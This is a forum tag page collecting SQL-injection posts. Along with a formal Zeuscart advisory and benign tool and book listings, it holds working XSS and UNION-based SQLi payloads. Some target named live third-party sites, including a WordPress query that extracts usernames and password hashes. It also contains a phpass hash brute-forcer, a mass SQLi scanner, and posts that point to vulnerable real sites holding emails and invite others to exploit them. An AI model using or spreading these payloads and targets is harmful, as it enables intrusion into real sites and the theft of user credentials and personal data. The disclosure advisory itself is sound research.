Showing results for tags 'sql'.

  1. Advisory: Multiple reflecting XSS-, SQLi and InformationDisclosure-vulnerabilities in Zeuscart v.4

    Advisory ID: SROEADV-2015-12
    Author: Steffen Rösemann
    Affected Software: Zeuscart v.4
    Vendor URL: http://zeuscart.com/
    Vendor Status: pending
    CVE-ID: will be asked to be assigned after release on FullDisclosure via OSS-list
    Software used for research: Mac OS X 10.10, Firefox 35.0.1

    ==========================
    Vulnerability Description:
    ==========================

    ECommerce-Shopping Cart Zeuscart v. 4 suffers from multiple XSS-, SQLi- and InformationDisclosure-vulnerabilities.

    ==================
    Technical Details:
    ==================

    ====
    XSS
    ===

    Reflecting XSS-vulnerabilities can be found in a common Zeuscart-installation in the following locations and could be exploited, for example, by crafting a link and making a registered user click on that link.

    The parameter "search", which is used in the index.php, is vulnerable to XSS-attacks.

    Exploit-Example:

    http:// {TARGET}/index.php?do=search&search=%22%3E%3Cbody%20onload=eval%28alert%28document.cookie%29%29%20%3E%3C!--

    By appending arbitrary HTML- and/or JavaScript-code to the parameter "schltr", which is as well used in index.php, an attacker could exploit this XSS-vulnerable parameter:

    Exploit-Example:

    http:// {TARGET}/index.php?do=brands&schltr=All%3Cbody%20onload=eval%28alert%28String.fromCharCode%2888,83,83%29%29%29%20%3E

    The third XSS-vulnerability can be found in the "brand"-parameter, which is again used in index.php.

    Exploit-Example:

    http:// {TARGET}/index.php?do=viewbrands&brand=Bata%3Cbody%20onload=eval%28alert%28String.fromCharCode%2888,83,83%29%29%29%20%3E

    ====
    SQLi
    ====

    The SQL injection-vulnerabilities can be found in the administrative backend of Zeuscart v. 4 and reside in the following locations in a common installation.

    By appending arbitrary SQL statements to the "id"-parameter, an attacker could exploit this SQL injection vulnerability:

    Exploit-Example:

    http:// {TARGET}/admin/?do=disporders&action=detail&id=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,database%28%29,34,35,version%28%29,37,38+--+

    Another SQL injection vulnerability can be found here and can be exploited by appending SQL statements to the vulnerable "cid"-parameter:

    Exploit-Example:

    http:// {TARGET}/admin/?do=editcurrency&cid=1+and+1=2+union+select+1,database%28%29,3,version%28%29,5+--+

    The last SQL injection vulnerability I found can be found in the following location and can be exploited by appending SQL statements to the vulnerable "id" parameter:

    http:// {TARGET}/admin/?do=subadminmgt&action=edit&id=1+and+1=2+union+select+1,version%28%29,3,database%28%29,5+--+

    ==============
    Information Disclosure
    ==============

    The administrative backend of Zeuscart v. 4 allows the admin to use a functionality which displays the PHP-installation settings via phpinfo():

    http://{TARGET}/admin/?do=getphpinfo

    Unfortunately, the PHP-script does not check if an authorized admin executes this functionality: it is possible even for unregistered users to request the above link to see the information phpinfo() displays. That could expose sensitive information to an attacker, which could lead to further exploitation.

    =========
    Solution:
    =========

    Vendor has been notified. After releasing a patch, which seems not to correct the issues, the vendor decided not to respond anymore to figure out a solution together.

    Currently, there is no patch available to secure Zeuscart-installations.

    ====================
    Disclosure Timeline:
    ====================

    21-Jan-2015 - found the vulnerabilities
    21-Jan-2015 - informed the developers (see [3])
    21-Jan-2015 - release date of this security advisory [without technical details]
    21-Jan-2015 - fork of the repository to keep the vulnerable version available for other researchers (see [5])
    22-Jan-2015 - vendor responded, provided detailed information
    04-Feb-2015 - vendor patches Bin/Core/Assembler.php; vulnerabilities are still exploitable, which has been reported to the vendor (see [3])
    19-Feb-2015 - asked the vendor again, if he will patch these issues (see [3]); vendor did not respond
    21-Feb-2015 - release date of this security advisory
    21-Feb-2015 - sent to FullDisclosure

    ========
    Credits:
    ========

    Vulnerabilities found and advisory written by Steffen Rösemann.

    ===========
    References:
    ===========

    [1] http://zeuscart.com/
    [2] https://github.com/ZeusCart/zeuscart
    [3] https://github.com/ZeusCart/zeuscart/issues/28
    [4] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-12.html
    [5] https://github.com/sroesemann/zeuscart

    Source
  2. SQL vulnerability with lots of e-mail addresses! As far as I know, at the last check I spent 2 hours and still did not manage to extract all the e-mail addresses!

    http://www.maritime-database.com/company.php?cid=306976
    http://www.psychicguild.com/dream_interpretation.php?id=16882
  3. Services Affected: OpenCRM from Software Add-ons - Adding Value to Your Business
    Threat Level: High
    Severity: High
    CVSS Severity Score: 8.0
    Impact type: Complete confidentiality, integrity and availability violation.

    Vulnerability:
    (3) Error-Based SQL Injection Vulnerabilities
    (2) Time-Based Blind SQL Injection Vulnerabilities

    Vendor Overview
    OpenCRM is a Software as a Service (SaaS) Customer Relationship Management solution. A leading OpenCRM software, and a true alternative to Salesforce, and other SaaS hosted CRM providers.

    Proof of Concept:
    https://demo.opencrm.co.uk:443/index.php?action=index&module=Calendar&action=setField&curr_row=&field=a ssigned_user_id&mode=list&module=Field&popuptype=&record=1&value='AND(Select%201%20from(selec t%20count(*)%2cconcat((select%20concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(112)%2cC HAR(73)%2cCHAR(108)%2cCHAR(88)%2cCHAR(72)%2cCHAR(51)%2cCHAR(52)%2cCHAR(114))%20f rom%20information_schema.tables%20limit%200%2c1)%2cfloor(rand(0)*2))x%20from%20information_sche ma.tables%20group%20by%20x)a)and'&viewid=0

    Read more: http://dl.packetstormsecurity.net/1502-exploits/OpenCRM.pdf
  4. Hello all, you have to visit the website. We established a website error to the website over the world. Common errors such as SQL injection, Cross-site Scripting (XSS), Local File Inclusion, Remote File Inclusion, Bug. Sincerely thank you, trace our website.

    © Vulnerability VN 2015 - All Rights Reserved

    Share 230 Website SQL injection
    Link Here: Vulnerability VN
  5. [+] Exploit Title : Invem CMS SQL INJECTION Vulnerability
    [+] Exploit Author : Ashiyane Digital Security Team
    [+] Vendor Homepage: http://www.invem.com/
    [+] Google Dork : intext:Powered by INVEM.
    [+] Date : 20 / Jan / 2015
    [+] Tested On : windows se7en + linux Kali + Google Chrome + Mozilla

    [+] DEMO
    [+] http://www.onemart.cc/news_view.php?newsid=124%27
    [+] http://www.jcptdc.com/about.php?id=1%27
    [+] http://www.plmgroup.cn/news_view.php?newsid=122%27

    [+] Discovered by : SeRaVo.BlackHat
    [+] Hassan
    [+] ~ General.BlackHat@Gmail.com ~ https://www.facebook.com/general.blackhat
    [+] ~ Unitazad@YaHoo.com ~ https://twitter.com/strip_ssl

    [+] MY FRIEND'Z : Unhex.coder + #N3T + Lupin 13 + AMOK + Milad.Hacking + 3cure BlackHat + Dr.3vil
    [+] Mr.Time + SHD.N3T + MR.M@j!D + eb051 + RAMIN + ACC3SS + X3UR + 4li.BlackHat + IraQeN-H4XORZ
    [+] Dj.TiniVini + NoL1m1t + l4tr0d3ctism + r3d_s0urc3 + 0x0ptim0us + E1.Coders + MR.F@RDIN
    [+] 0xTiger + C4T + Predator + S!Y0U.T4r.6T + soheil.hidd3n + Soldier + Spoofer + Cyb3r_Dr4in
    [+] Net.editor + M3QDAD + M.R.S.CO + Hesam King + Evil Shadow + 3H34N + G3N3Rall + Mr.XHat
    [+] And All Iranian Cyber Army ...\.
    [+] Home : Ashiyane.org/Forum

    Source : Sites Powered By INVEM SQL Injection ? Packet Storm
  6. Aerosol

    w3af

    w3af is a Web Application Attack and Audit Framework. The w3af core and its plugins are fully written in Python; it identifies more than 200 vulnerabilities and reduces your site’s overall risk exposure. Identify vulnerabilities like SQL Injection, Cross-Site Scripting, Guessable credentials, Unhandled application errors and PHP misconfigurations.

    Download: https://github.com/andresriancho/w3af
  7. Database changes monitor

    SQLWatch 4.0 - tool for monitoring and profiling SQL queries in an application at the JDBC driver layer.

    Currently supported JDBC drivers:
      • MySQL - directly supported
      • Other (including MySQL) - supported through the log4jdbc driver proxy

    Profiling:
      • How many times is the same data selected from the database per operation?
      • How long does it take to perform all SQL queries per operation?
      • Are the SQL queries efficient?

    SQLWatch-QueriesProfiler: listens to all SQL queries from the JDBC driver and aggregates them. When no queries are received within 5 sec (configurable), the query statistics are printed to stdout.

    Download:
    http://sqlwatch.googlecode.com/files/sqlwatch-4.0-preview-v1.zip
    http://sqlwatch.googlecode.com/files/sqlwatch3.0.0.jar
  8. I made a small script that scans the URLs you put in a text file. It is not very sophisticated, but I will keep improving it.

    <?php
    echo'<title>URL List SQLi scanner</title>';
    echo "<u><tr>Utilizare:</tr></br></u> Creeaza un fisier adrese.txt in care sa existe pe fiecare linie cate o adresa url</br> in formatul http://url.tld . Url-urile vulnerabile vor fi afisate si vor fi salvate si in fisierul bune.txt</br></br>";

    $fisier = file_get_contents('adrese.txt'); // Read the list of URLs
    $linii = explode("\n", $fisier); // Take each URL
    $fisier = fopen("bune.txt", "a"); // The vulnerable ones are written here

    echo"<u>Url-uri vulnerabile:</u></br></br>";
    for($i = 0; $i < count($linii) - 1; $i++)
        scann($linii[$i]); // Test each URL

    function scann($sqli) {
        global $fisier;
        $sintaxa="'";
        $fraza=file_get_contents("$sqli$sintaxa");
        $cuvant="error in your SQL syntax";
        $pos = strpos($fraza,$cuvant);
        if($pos === false) {
            $ok=0;
        }
        else {
            $ok=1;
        }
        if($ok==1) {
            fwrite($fisier, $sqli . "\n"); // Write the vulnerable URLs to bune.txt
            echo"$sqli <br>"; // Display the vulnerable URLs
        }
    }

    fclose($fisier); // Close the file
    echo '<center></br></br>URL List SQLi Scanner v1.0 - Silvian0 @ <a href="http://rstcenter.com">RSTCenter.com</a></center>';
    ?>
  9. A mixed bag: new and old / attack and defense / for developers, managers, testers / PHP, AJAX, Rails, Java, .NET, Oracle etc.

      • Ajax Security [2007]
      • Apache Security [2005]
      • Applied Oracle Security: Developing Secure Database and Middleware Environments [2009]
      • BackTrack 4: Assuring Security by Penetration Testing [2011]
      • Beginning ASP.NET Security [2010]
      • Core Security Patterns: Best Practices and Strategies for J2EE, Web Services, and Identity Management [2005]
      • Cracking Drupal: A Drop in the Bucket [2009]
      • Developer's Guide to Web Application Security [2007]
      • E-Commerce: A Control and Security Guide [2004]
      • Enterprise Web Services Security [2005]
      • Essential PHP Security [2005]
      • Expert Web Services Security in the .NET Platform [2004]

    request download ticket | ifile.it

    ---

      • Google Hacking for Penetration Testers [2005]
      • Google Hacking for Penetration Testers, Volume 2 [2007]
      • Hacker Web Exploitation Uncovered [2005]
      • Hacking Exposed Web 2.0 [2007]
      • Hacking Exposed Web Applications, 3rd Edition [2011]
      • HackNotes Web Security Pocket Reference [2003]
      • Hack Proofing ColdFusion [2002]
      • Hack Proofing Your E-Commerce Site [2001]
      • Hack Proofing Your Web Applications [2001]
      • How to Break Web Software: Functional and Security Testing of Web Applications and Web Services [2006]
      • Implementing Database Security and Auditing: Includes Examples for Oracle, SQL Server, DB2 UDB, Sybase [2005]
      • Joomla! Web Security [2008]
      • Mastering Web Services Security [2003]
      • ModSecurity 2.5 [2009]
      • ModSecurity Handbook [2010]
      • Oracle Security [1998]
      • php architect's Guide to PHP Security [2005]
      • Practical Oracle Security: Your Unauthorized Guide to Relational Database Security [2007]

    request download ticket | ifile.it

    ---

      • Preventing Web Attacks with Apache [2006]
      • Pro PHP Security: From Application Security Principles to the Implementation of XSS Defenses, Second Edition [2010]
      • Secure E-Government Web Services [2005]
      • Securing PHP Web Applications [2009]
      • Security for Web Services and Service-Oriented Architectures [2009]
      • Security Fundamentals for E-Commerce [2002]
      • Security on Rails [2009]
      • Security Technologies for the World Wide Web, Second Edition [2002]
      • Seven Deadliest Web Application Attacks [2010]
      • SQL Injection Attacks and Defense [2009]
      • SQL Server Security Distilled [2004]
      • SSL & TLS Essentials: Securing the Web [2000]
      • The Oracle Hacker's Handbook: Hacking and Defending Oracle [2007]
      • The Web Application Hacker's Handbook: Discovering and Exploiting Security Flaws [2007]
      • The Database Hacker's Handbook: Defending Database Servers [2005]
      • Web 2.0 Security - Defending AJAX, RIA, AND SOA [2007]
      • Web Application Vulnerabilities: Detect, Exploit, Prevent [2007]
      • Web Hacking: Attacks and Defense [2002]
      • Web Security, Privacy and Commerce, 2nd Edition [2002]
      • Web Security Testing Cookbook: Systematic Techniques to Find Problems Fast [2008]
      • Web Services Security [2003]
      • XML Security [2002]
      • XSS Exploits and Defense [2007]

    request download ticket | ifile.it
  10. Login X

    Please give the method/syntax as well. Explain a little how it works.

    PS: I know I keep bothering you with this kind of stuff...
  11. For those taking SQL quizzes at school for that oracle-shit diploma. linux/windows/mac ©miN 2012

    Are you tired of switching to the Google tab, copy-pasting the question, then picking a relevant site, then finding the question, then looking for its answer, picking it out by or by however it is laid out on the page, then going back to the tab with the open quiz and ticking the correct answer there as well? With this program all you need is a simple Ctrl-C Ctrl-V, and after you press Enter you get the correct answer in less than a second.

    The script can very easily be adapted to other kinds of question-answer(s) pairs; the only thing that has to be changed (added) is the function that parses the page where the identical question was found, so that it can extract the answer below the question using a pattern coded by you, of course.

    Even if none of the above interests you, the program is robust and well put together, with clear, commented code and logic that follows the order of the actions, and it is a very good example for fans of concurrent programming and of a minimal, zero-dependency link between interface and engine, even though there are primitive live synchronizations.

    [Python] oaf - Pastebin.com

    #! /usr/bin/env python
    # Oracle Answer Finder
    # 02.05.2012 cmiN

    from Tkinter import *
    from urllib2 import build_opener, HTTPError, URLError
    from urlparse import urlparse
    from threading import Thread, Event
    from socket import setdefaulttimeout, timeout


    # constants
    SMAX = 8 # maximum number of results
    DIFF = 512 # how many chars to skip until the answer
    TOUT = 2 # timeout in seconds


    class GUI(Frame):

        def __init__(self, master=None, margin=10):
            Frame.__init__(self, master)
            self.app = Engine() # main app
            self.thread = None # Thread object used for parallel processing
            self.master.title("OAF - cmiN")
            self.grid(padx=margin, pady=margin)
            self.widgets()
            self.mainloop()

        def callback(self, event):
            """What happens after you press Enter in Question's entry."""
            # get and edit question
            qon = self.app.edit_qon(self.qEntry.get())
            if self.thread: # if it was initialized before
                # check question
                if qon == self.app.qon[0]: # same question (no reset)
                    if self.thread.is_alive(): # let it finish
                        return
                    else:
                        self.app.data = "" # empty buffer
                        self.app.dataLen = 0
                else: # another
                    if self.thread.is_alive():
                        self.app.stop()
                        self.thread.join()
                    self.app.reset() # reset everything
            # set question
            self.app.set_qon(qon)
            # process data
            self.thread = Thread(target=self.app.process)
            self.thread.start()
            # no return

        def widgets(self):
            # variables
            self.statusVar = StringVar(value="Ready.") # passed to Thread class for live updating
            #self.ansVar = StringVar() # same thing, but for answer
            self.app.statusVar = self.statusVar
            #self.app.ansVar = self.ansVar
            # label-entry pairs
            self.qLabel = Label(self, text="Question:")
            self.qEntry = Entry(self, width=100)
            self.aLabel = Label(self, text="Answer:")
            #self.aEntry = Entry(self, width=100, textvariable=self.ansVar)
            self.qLabel.grid(row=0, column=0, sticky="w")
            self.qEntry.grid(row=1, column=0)
            self.aLabel.grid(row=2, column=0, sticky="w")
            #self.aEntry.grid(row=3, column=0)
            # status widget
            self.sLabel1 = Label(self, text="Status:")
            self.sLabel2 = Label(self, width=86, textvariable=self.statusVar, relief="sunken", bd=2, anchor="c")
            self.sLabel1.grid(row=4, column=0, sticky="w")
            self.sLabel2.grid(row=5, column=0, sticky="w")
            # text instead entry for answer
            self.ansText = Text(self, width=75, height=10)
            self.ansText.grid(row=3, column=0)
            self.app.ansText = self.ansText # make it available to the engine
            # behavior
            self.qEntry.bind("<Return>", self.callback)
            self.qEntry.bind("<KP_Enter>", self.callback)


    class Engine:

        def __init__(self):
            setdefaulttimeout(TOUT)
            self.opener = build_opener()
            self.opener.addheaders = [("User-agent", "Mozilla/5.0")]
            self.qon = ["", ""] # question
            self.data = "" # data contain the question [and answer]
            self.dataLen = 0 # data length
            self.start = 0 # google first result
            self.first = "url?q=" # from
            self.second = "&amp" # to
            self.seen = set() # evidence of visited links
            self.statusVar = None # through this set status
            self.ansVar = None # through this set answer if available
            self.ansText = None # almost same shit
            self.__stop = Event() # stop the process
            self.upEvent = Event() # solve the deadlock
            self.upEvent.set() # means it's safe (.wait will wait until .set is called or .is_set() is True)

        def update(self, status, answer):
            """Here is a fucking deadlock, when the same function is called simultaneously."""
            self.upEvent.wait() # wait to be setted
            self.upEvent.clear() # make it busy
            # do your ugly things
            if hasattr(self.statusVar, "set") and hasattr(self.statusVar, "get"):
                self.statusVar.set(status)
                self.statusVar.get() # just to make sure the update finished
            if hasattr(self.ansVar, "set") and hasattr(self.ansVar, "get"):
                self.ansVar.set(answer)
                self.ansVar.get()
            if hasattr(self.ansText, "insert") and hasattr(self.ansText, "delete"):
                self.ansText.delete(0.0, END)
                self.ansText.insert(0.0, answer)
            self.upEvent.set() # make it available

        def stop(self):
            self.update("Stopping...", "")
            self.__stop.set()

        def stopped(self):
            return self.__stop.is_set()

        def reset(self):
            self.__stop.clear()
            self.start = 0
            self.seen = set()
            #self.update("Ready.", "")

        def edit_qon(self, qon):
            return qon.strip().split("\n")[0] # idiot proof

        def set_qon(self, qon):
            """Set question."""
            self.qon[0] = qon
            self.qon[1] = '"' + self.qon[0].replace(" ", "+") + '"'

        def find(self):
            """Find links corresponding to query using google.
            Returns:
                0 -> match, link extracted, data updated
                1 -> no match for exact string
                2 -> url already visited or invalid url
                3 -> banned
                4 -> maximum number of results exceeded
            """
            if self.start >= SMAX:
                return 4
            link = "http://www.google.com/search?q={}&start={}".format(self.qon[1], self.start)
            try:
                fobj = self.opener.open(link)
            except HTTPError:
                self.update("Google banned you.", "")
                return 3
            except timeout:
                self.update("Timed out or Google banned you.", "")
                return 3
            else:
                data = fobj.read() # google's source
                fobj.close()
            # find a relevant closest position to the link
            index1 = data.find(self.first)
            if index1 == -1: # no results in page or modified pattern
                return 1 # invalid source
            self.start += 1 # now do the increment
            index1 += len(self.first)
            index2 = data.find(self.second, index1)
            url = data[index1:index2]
            # edit url
            newurl = ""
            i = 0
            length = len(url)
            while i < length:
                if url[i] == "%":
                    char = chr(int(url[i + 1] + url[i + 2], 16))
                    i += 2
                else:
                    char = url[i]
                newurl += char
                i += 1
            url = newurl
            # process it
            if url in self.seen: # link already visited
                return 2
            self.seen.add(url)
            upo = urlparse(url)
            self.update("Looking in %s..." % upo.netloc, "")
            try:
                fobj = self.opener.open(url)
            except URLError:
                self.update("Invalid link.", "")
                return 2
            except timeout:
                self.update("Timed out.", "")
                return 3
            else:
                self.data = fobj.read()
                self.dataLen = len(self.data)
                fobj.close()
            return 0 # all fine

        def check(self, old, index):
            if index < 0 or index >= self.dataLen:
                return False # invalid index
            if abs(old - index) > DIFF:
                return False # too far
            return True # ok

        def get_star(self, index):
            """Find the line with .
            Returns:
                str -> good answer
                False -> invalid answer or couldn't find
            """
            ansNr = 1 # default answers (for multiple ones)
            chunk = "(Choose "
            firstTag = self.data.find("<", index)
            chunkIndex = self.data.find(chunk, index, firstTag)
            if chunkIndex != -1:
                chunkIndex += len(chunk)
                number = ""
                while self.data[chunkIndex] != ")":
                    number += self.data[chunkIndex]
                    chunkIndex += 1
                number = number.strip().lower()
                if number == "two":
                    ansNr = 2
                elif number == "three":
                    ansNr = 3
                elif number == "four":
                    ansNr = 4 # i don't think this actually exists
            star = "(*)"
            last = index
            ans = ""
            while ansNr:
                index = self.data.find(star, last) - 1
                last = index + 1 + len(star)
                if index < 0:
                    return False # invalid answer type
                # ok now we're good
                old = index
                while True:
                    tag = True
                    while self.data[index] != ">":
                        if tag and self.data[index].isspace():
                            index -= 1
                            continue
                        if tag:
                            ans = "\n" + ans
                            tag = False # found alphanumeric
                        ans = self.data[index] + ans
                        index -= 1
                        if not self.check(old, index):
                            return False
                    ans = ans.strip()
                    if tag and len(ans) > 0:
                        break
                    while self.data[index] != "<":
                        index -= 1
                    index -= 1
                ansNr -= 1
                ans = "\n" + ans
            return ans.strip()

        def get_single(self, index):
            """Line with single answer.
            Returns:
                str -> good answer
                False -> invalid answer or couldn't find
            """
            new = True # first answer (if multiple)
            ans = ""
            smooth = 1 # tag number difference
            while True:
                old = index
                # go to the first tag
                while self.data[index] != "<":
                    index += 1
                    if not self.check(old, index):
                        return False
                # no skip all of them
                nrTag = 0
                while self.data[index] == "<":
                    while self.data[index] != ">":
                        index += 1
                    index += 1
                    nrTag += 1 # add tag
                    if not self.check(old, index):
                        return False
                if new:
                    new = False # not new anymore
                    model = nrTag
                if abs(nrTag - model) > smooth:
                    break # no incoming answers to this question
                while self.data[index] != "<":
                    ans += self.data[index]
                    index += 1
                    if not self.check(old, index):
                        return False
                # add separator (don't worry, we will strip it at the end)
                ans = ans.strip() + "\n\n"
            ans = ans.strip()
            if ans == "":
                return False # empty one
            return ans

        def process(self):
            """Try to find answers to quiz questions by searching them on google.
            Format string, search it on google, locate first %d results,
            then search among them for patterns
            (question<>...<>answer<> or question<>answer...<>).
            Returns:
                str -> answer found (or false positive)
                1 -> invalid/inexistent question (or google invalid source pattern)
                2 -> answer not found (or different search pattern)
                3 -> stopped
                4 -> banned
            """ % SMAX
            ret = 0 # virtual return
            while True:
                if self.stopped():
                    return 3 # stopped
                if ret == 1:
                    self.update("Invalid question.", "")
                    return 1 # invalid question
                elif ret == 2: # already seen or invalid
                    ret = self.find()
                    continue
                elif ret == 3:
                    return 4 # timed out or banned (too many queries)
                elif ret == 4:
                    self.update("Nothing found.", "")
                    return 2 # not found
                index = self.data.find(self.qon[0])
                if index >= 0:
                    #index += len(self.qon[0]) # conflict with star (need some data from question)
                    ans = self.get_star(index)
                    if not ans:
                        ans = self.get_single(index)
                    if ans:
                        self.update("Answer found!", ans)
                        return ans # string ok
                ret = self.find()


    if __name__ == "__main__":
        GUI(Tk())

    Once I consider that it never fails and does nothing too weird (within the limits of the user's common sense), I will freeze a version with a Windows executable; for now, report bugs, criticism and opinions to me. Still, if you do not have the patience to install Python on other machines, you can sort that out very quickly with cx_Freeze.

    New! If you do not like the answer you got, you can press Enter once more on the same question and it will look through the next results for a new answer. If you change the question and press Enter again while it is searching, it is signalled to stop the current search and then moves on to the new one (experimental, it still freezes sometimes (deadlocks)).

    I also promised you the portable version for Windows: box gf
  12. Wordpress Sql Injection

    App : FBConnect WordPress Plugin
    Type : Sql-Injection
    Dork : inurl:"fbconnect_action=myhome"
    Exploit : ?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)kiddevilz,7,8,9,10,11,12+from+wp_users--
    PoC : www.site.name/path/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)kiddevilz,7,8,9,10,11,12+from+wp_users--
    Example: http://www.ariesdubs.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat%28user_login,0x3a,user_pass%29kiddevilz,7,8,9,10,11,12+from+wp_users--

    ok when you have the hash, md5 and encode64() you can test a bruteforce with this (python):

    # code by : tdxev
    # website : www.tdxev.com
    # team : www.insecurity.ro
    # version : 2011.01.17
    # documentation : /wp-includes/class-phpass.php

    import md5
    import time

    # user settings
    wpHashList = ["$P$BRDa64Z9uIwrPlsRPDbWrVwLqvh7340"] # list of wordpress hashes
    #$P$BRDa64Z9uIwrPlsRPDbWrVwLqvh7340 = tdxev
    charSet = 'abcdefghijklmnopqrstuvwxyz0123456789_-' # the character set that the script will use
    dumpFile = '/tmp/wp_crack_result.txt' # the file where the script will dump the result for each hash
    progFile = '/tmp/wp_crack_progress.txt' # the file where the script will keep track of progress made

    # app settings
    itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz' # used by crypt_private

    def encode64 (textInput,count):
        output = ''
        i = 0
        while i < count :
            i = i + 1
            value = ord(textInput[i-1])
            output = output + itoa64[value & 63]
            if i < count :
                value = value | ord(textInput[i]) << 8
            output = output + itoa64[(value >> 6) & 63]
            i = i + 1
            if i >= count:
                break
            if i < count:
                value = value | ord(textInput[i]) <<16
            output = output + itoa64[(value >> 12) & 63]
            i = i + 1
            if i >= count:
                break
            output = output + itoa64[(value >> 18) & 63]
        return output

    # generate wordpress hash
    def crypt_private (plainText, wordpressHash):
        output = '*0' # old type | not supported yet
        if wordpressHash[0:2] == output:
            output = '*1'
        if wordpressHash[0:3] != '$P$': # old type | not supported yet
            return output
        count_log2 = itoa64.find(wordpressHash[3]) # get how many times it will generate the hash
        if (count_log2 < 7) or (count_log2>30):
            return output
        count = 1 << count_log2 # get how many times it will generate the hash
        salt = wordpressHash[4:12] # get salt from the wordpress hash
        if len(salt) != 8 :
            return output
        plainTextHash = md5.new(str(salt)+str(plainText)).digest() # generate the first hash from salt and word to try
        for i in range (count):
            plainTextHash = md5.new(str(plainTextHash)+str(plainText)).digest() # regenerate the hash
        output = wordpressHash[0:12] # get the first part of the wordpress hash (type,count,salt)
        output = output + encode64(plainTextHash,16) # create the new hash
        return output

    # class that generates the words
    class wordGenerator ():
        def __init__(self, word, charSet):
            self.setCurretWord(word) # word to start
            self.setCharSet(charSet) # character set used to generate the words

        # set current word
        def setCurretWord (self, word):
            self.currentWord = word

        # set the character set that will be used
        def setCharSet (self, charSet):
            self.charSet = charSet

        # generate the next word, set that word as currentWord and return the word
        def nextWord (self):
            self.setCurretWord( self._incWord(self.currentWord) )
            return self.currentWord

        # generate the next word
        def _incWord(self, word):
            word = str(word) # convert to string
            if word == '': # if word is empty
                return self.charSet[0] # return first char from the char set
            wordLastChar = word[len(word)-1] # get the last char
            wordLeftSide = word[0:len(word)-1] # get word without the last char
            lastCharPos = self.charSet.find(wordLastChar) # get position of last char in the char set
            if (lastCharPos+1) < len(self.charSet): # if position of last char is not at the end of the char set
                wordLastChar = self.charSet[lastCharPos+1] # get next char from the char set
            else: # it is the last char
                wordLastChar = self.charSet[0] # reset last char to the first character from the char set
                wordLeftSide = self._incWord(wordLeftSide) # send left side to be increased
            return wordLeftSide + wordLastChar # return the next word

    # check if it is the right type of hashes
    for wpHash in wpHashList:
        if wpHash[0:3] != '$P$':
            print "Wrong password type or password type is DES not impemented yet!"
            exit()

    # create a new wordGenerator
    newWord = wordGenerator ('',charSet); # word generator
    wordsFound = 0
    exitLoop = False

    def found(hashItem, word):
        global wordsFound
        global exitLoop
        d = open(dumpFile,'a') # open file for append
        d.write(hashItem + ' = ' + word +"\n") # write the result
        d.close() # close file
        wordsFound = wordsFound + 1 # increase the number of hashes cracked
        print hashItem + ' = ' + word # display the word
        if wordsFound == len(wpHashList): # if the number of hashes cracked is equal to the number of hashes in the list
            exitLoop = True # raise flag to stop the loop and exit

    def setProgress(word) :
        d = open(progFile,'w') # open file for writing
        d.write("Position :"+ word +"\n") # write the current word
        d.close() # close file

    count = 0
    while exitLoop == False:
        word = newWord.nextWord()
        count = count + 1
        #print word
        for wpHash in wpHashList:
            newHash = crypt_private(word,wpHash)
            if wpHash == newHash :
                found(newHash,word)
        if count == 1000 :
            count = 0
            setProgress(word)

    H4ve fun :D:D
  13. There are many vulnerable links but One vulnerable link is given: Whoever completes PM me..... http://gtu.ac.in:80/result/may_jun_j...jul10_show.asp http://gtu.ac.in/Result/May_Jun_Jul10/Result_MB2_May10.asp